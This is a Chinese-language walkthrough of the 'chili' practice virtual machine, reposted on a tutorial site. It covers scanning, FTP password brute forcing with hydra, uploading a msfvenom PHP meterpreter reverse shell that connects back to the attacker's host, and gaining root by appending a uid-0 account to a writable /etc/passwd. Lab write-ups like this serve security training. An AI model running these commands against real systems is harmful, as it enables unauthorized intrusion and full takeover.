C/C++教程

chili

本文主要是介绍chili,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

靶机准备

首先将靶机ova文件导入
image
网络模式改为NAT
扫描ip

netdiscover -r 192.168.164.0/24

image
kali:192.168.164.137

渗透测试

扫描端口

nmap -sS -sV -T5 -A -p- 192.168.164.186

开启了2个端口:21、80
image
扫描目录:

dirb http://192.168.164.186

image
直接访问网站,只有一个小辣椒
image
查看源码,有一些关键信息
image
爬取关键词生成字典,爆破FTP服务

cewl http://192.168.164.186 > test.txt

image
image
爆破FTP

hydra -L /root/test.txt -P /usr/share/wordlists/fasttrack.txt -f -V ftp://192.168.164.186

image
获得用户:chili 密码:a1b2c3d4

利用

登入FTP
image
查看网站目录/var/www/html,看看文件和权限
image
发现.nano有最高权限,msf生成马上传到.nano里
生成马:

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.164.137 LPORT=1234 raw  > shell.php

image
ftp上传到.nano设置777权限

put /root/shell.php /var/www/html/.nano/shell1.php

将shell.php赋予执行权限

chmod 777 /var/www/html/.nano/shell1.php

image
MSF开启监控,连接php马

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.164.137
set lport 1234
run

image

提权

切换交互式shell

python3 -c "import pty;pty.spawn('/bin/bash')"

image
查看时普通权限
image
在/etc目录下看见passwd具有写操作,尝试/etc/passwd提权
image
使用命令:perl -le 'print crypt("test","test")' ,这个命令为使用perl脚本语言,执行crypt模块,将test加密字符串输出;
image
使用命令:echo "test:teH0wLIpW0gyQ:0:0:ROOT:/root:/bin/bash" >> /etc/passwd
在passwd文件中,写入test账户信息
成功提权
image
提权后进入root目录下获取flag
image

这篇关于chili的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!